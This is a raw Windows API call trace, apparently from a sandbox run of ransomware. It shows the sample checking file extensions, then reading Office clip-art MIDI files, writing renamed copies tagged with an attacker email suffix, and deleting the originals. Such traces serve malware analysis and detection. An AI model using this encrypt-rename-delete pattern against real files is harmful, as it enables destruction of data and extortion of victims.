(lpString=".docx") returned 5 [0268.402] lstrcmpiW (lpString1=".docx", lpString2="3.MID") returned -1 [0268.402] lstrlenW (lpString=".pdf") returned 4 [0268.402] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.402] lstrlenW (lpString=".xls") returned 4 [0268.402] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.402] lstrlenW (lpString=".xlsx") returned 5 [0268.402] lstrcmpiW (lpString1=".xlsx", lpString2="3.MID") returned -1 [0268.402] lstrlenW (lpString=".ppt") returned 4 [0268.402] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.402] lstrlenW (lpString=".zip") returned 4 [0268.402] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.402] lstrlenW (lpString=".rar") returned 4 [0268.402] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.402] lstrlenW (lpString=".bz2") returned 4 [0268.402] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.402] lstrlenW (lpString=".7z") returned 3 [0268.402] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.402] lstrlenW (lpString=".dbf") returned 4 [0268.403] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.403] lstrlenW (lpString=".1cd") returned 4 [0268.403] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.403] lstrlenW (lpString=".jpg") returned 4 [0268.403] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.403] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.403] lstrlenW (lpString="PARNT_04.MID") returned 12 [0268.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.404] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=6070) returned 1 [0268.404] CloseHandle (hObject=0x348) returned 1 [0268.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid")) returned 0x20 [0268.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.404] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.404] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0268.466] GetLastError () returned 0x0 [0268.466] ReadFile (in: hFile=0x348, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x17b6, lpOverlapped=0x0) returned 1 [0268.468] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x17c0, lpOverlapped=0x0) returned 1 [0268.469] ReadFile (in: hFile=0x348, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.469] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.469] SetEndOfFile (hFile=0x3a0) returned 1 [0268.469] CloseHandle (hObject=0x3a0) returned 1 [0268.469] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.469] SetEndOfFile (hFile=0x348) returned 1 [0268.471] CloseHandle (hObject=0x348) returned 1 [0268.471] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.687] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid")) returned 1 [0268.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.696] lstrlenW (lpString=".doc") returned 4 [0268.696] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.696] lstrlenW (lpString=".docx") returned 5 [0268.696] lstrcmpiW (lpString1=".docx", lpString2="4.MID") returned -1 [0268.696] lstrlenW (lpString=".pdf") returned 4 [0268.696] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.696] lstrlenW (lpString=".xls") returned 4 [0268.696] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.696] lstrlenW (lpString=".xlsx") returned 5 [0268.696] lstrcmpiW (lpString1=".xlsx", lpString2="4.MID") returned -1 [0268.696] lstrlenW (lpString=".ppt") returned 4 [0268.696] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.696] lstrlenW (lpString=".zip") returned 4 [0268.696] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.696] lstrlenW (lpString=".rar") returned 4 [0268.696] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.696] lstrlenW (lpString=".bz2") returned 4 [0268.696] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.696] lstrlenW (lpString=".7z") returned 3 [0268.696] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.696] lstrlenW (lpString=".dbf") returned 4 [0268.696] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.696] lstrlenW (lpString=".1cd") returned 4 [0268.696] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.696] lstrlenW (lpString=".jpg") returned 4 [0268.696] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.697] lstrlenW (lpString=".doc") returned 4 [0268.697] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.697] lstrlenW (lpString=".docx") returned 5 [0268.697] lstrcmpiW (lpString1=".docx", lpString2="4.MID") returned -1 [0268.697] lstrlenW (lpString=".pdf") returned 4 [0268.697] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.697] lstrlenW (lpString=".xls") returned 4 [0268.697] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.697] lstrlenW (lpString=".xlsx") returned 5 [0268.697] lstrcmpiW (lpString1=".xlsx", lpString2="4.MID") returned -1 [0268.697] lstrlenW (lpString=".ppt") returned 4 [0268.697] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.697] lstrlenW (lpString=".zip") returned 4 [0268.697] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.697] lstrlenW (lpString=".rar") returned 4 [0268.697] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.697] lstrlenW (lpString=".bz2") returned 4 [0268.697] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.697] lstrlenW (lpString=".7z") returned 3 [0268.697] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.697] lstrlenW (lpString=".dbf") returned 4 [0268.698] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.698] lstrlenW (lpString=".1cd") returned 4 [0268.698] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0268.698] lstrlenW (lpString=".jpg") returned 4 [0268.698] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.698] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.698] lstrlenW (lpString="PARNT_05.MID") returned 12 [0268.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.757] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=6020) returned 1 [0268.757] CloseHandle (hObject=0x390) returned 1 [0268.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid")) returned 0x20 [0268.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0268.898] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.898] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.072] GetLastError () returned 0x0 [0269.072] ReadFile (in: hFile=0x2ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x1784, lpOverlapped=0x0) returned 1 [0269.079] WriteFile (in: hFile=0x2b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x1790, lpOverlapped=0x0) returned 1 [0269.080] ReadFile (in: hFile=0x2ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.080] WriteFile (in: hFile=0x2b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.080] SetEndOfFile (hFile=0x2b4) returned 1 [0269.080] CloseHandle (hObject=0x2b4) returned 1 [0269.080] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.080] SetEndOfFile (hFile=0x2ac) returned 1 [0269.084] CloseHandle (hObject=0x2ac) returned 1 [0269.084] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.084] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid")) returned 1 [0269.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.085] lstrlenW (lpString=".doc") returned 4 [0269.085] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.085] lstrlenW (lpString=".docx") returned 5 [0269.085] lstrcmpiW (lpString1=".docx", lpString2="5.MID") returned -1 [0269.085] lstrlenW (lpString=".pdf") returned 4 [0269.085] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.085] lstrlenW (lpString=".xls") returned 4 [0269.085] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.085] lstrlenW (lpString=".xlsx") returned 5 [0269.085] lstrcmpiW (lpString1=".xlsx", lpString2="5.MID") returned -1 [0269.085] lstrlenW (lpString=".ppt") returned 4 [0269.085] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.085] lstrlenW (lpString=".zip") returned 4 [0269.085] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.085] lstrlenW (lpString=".rar") returned 4 [0269.085] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.085] lstrlenW (lpString=".bz2") returned 4 [0269.086] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.086] lstrlenW (lpString=".7z") returned 3 [0269.086] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.086] lstrlenW (lpString=".dbf") returned 4 [0269.086] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.086] lstrlenW (lpString=".1cd") returned 4 [0269.086] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.086] lstrlenW (lpString=".jpg") returned 4 [0269.086] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.086] lstrlenW (lpString=".doc") returned 4 [0269.086] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.086] lstrlenW (lpString=".docx") returned 5 [0269.086] lstrcmpiW (lpString1=".docx", lpString2="5.MID") returned -1 [0269.086] lstrlenW (lpString=".pdf") returned 4 [0269.086] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.086] lstrlenW (lpString=".xls") returned 4 [0269.086] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.086] lstrlenW (lpString=".xlsx") returned 5 [0269.086] lstrcmpiW (lpString1=".xlsx", lpString2="5.MID") returned -1 [0269.086] lstrlenW (lpString=".ppt") returned 4 [0269.086] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.086] lstrlenW (lpString=".zip") returned 4 [0269.087] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.087] lstrlenW (lpString=".rar") returned 4 [0269.087] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.087] lstrlenW (lpString=".bz2") returned 4 [0269.087] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.087] lstrlenW (lpString=".7z") returned 3 [0269.087] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.087] lstrlenW (lpString=".dbf") returned 4 [0269.087] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.087] lstrlenW (lpString=".1cd") returned 4 [0269.087] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0269.087] lstrlenW (lpString=".jpg") returned 4 [0269.087] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.087] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0269.087] lstrlenW (lpString="SPRNG_01.MID") returned 12 [0269.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0269.088] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=6700) returned 1 [0269.088] CloseHandle (hObject=0x2ac) returned 1 [0269.088] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid")) returned 0x20 [0269.088] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0269.088] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.088] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.088] GetLastError () returned 0x0 [0269.088] ReadFile (in: hFile=0x2ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x1a2c, lpOverlapped=0x0) returned 1 [0269.099] WriteFile (in: hFile=0x2b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1a30, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x1a30, lpOverlapped=0x0) returned 1 [0269.100] ReadFile (in: hFile=0x2ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.100] WriteFile (in: hFile=0x2b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.100] SetEndOfFile (hFile=0x2b4) returned 1 [0269.100] CloseHandle (hObject=0x2b4) returned 1 [0269.100] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.100] SetEndOfFile (hFile=0x2ac) returned 1 [0269.374] CloseHandle (hObject=0x2ac) returned 1 [0269.374] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.404] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid")) returned 1 [0269.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.879] lstrlenW (lpString=".doc") returned 4 [0269.879] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.879] lstrlenW (lpString=".docx") returned 5 [0269.879] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.879] lstrlenW (lpString=".pdf") returned 4 [0269.879] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.879] lstrlenW (lpString=".xls") returned 4 [0269.879] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.879] lstrlenW (lpString=".xlsx") returned 5 [0269.879] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.879] lstrlenW (lpString=".ppt") returned 4 [0269.879] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.879] lstrlenW (lpString=".zip") returned 4 [0269.879] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.879] lstrlenW (lpString=".rar") returned 4 [0269.879] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.879] lstrlenW (lpString=".bz2") returned 4 [0269.880] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.880] lstrlenW (lpString=".7z") returned 3 [0269.880] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.880] lstrlenW (lpString=".dbf") returned 4 [0269.880] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.880] lstrlenW (lpString=".1cd") returned 4 [0269.880] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.880] lstrlenW (lpString=".jpg") returned 4 [0269.880] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.880] lstrlenW (lpString=".doc") returned 4 [0269.880] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.880] lstrlenW (lpString=".docx") returned 5 [0269.880] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.880] lstrlenW (lpString=".pdf") returned 4 [0269.880] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.880] lstrlenW (lpString=".xls") returned 4 [0269.880] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.880] lstrlenW (lpString=".xlsx") returned 5 [0269.880] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.880] lstrlenW (lpString=".ppt") returned 4 [0269.880] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.880] lstrlenW (lpString=".zip") returned 4 [0269.880] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.881] lstrlenW (lpString=".rar") returned 4 [0269.881] lstrcmpiW 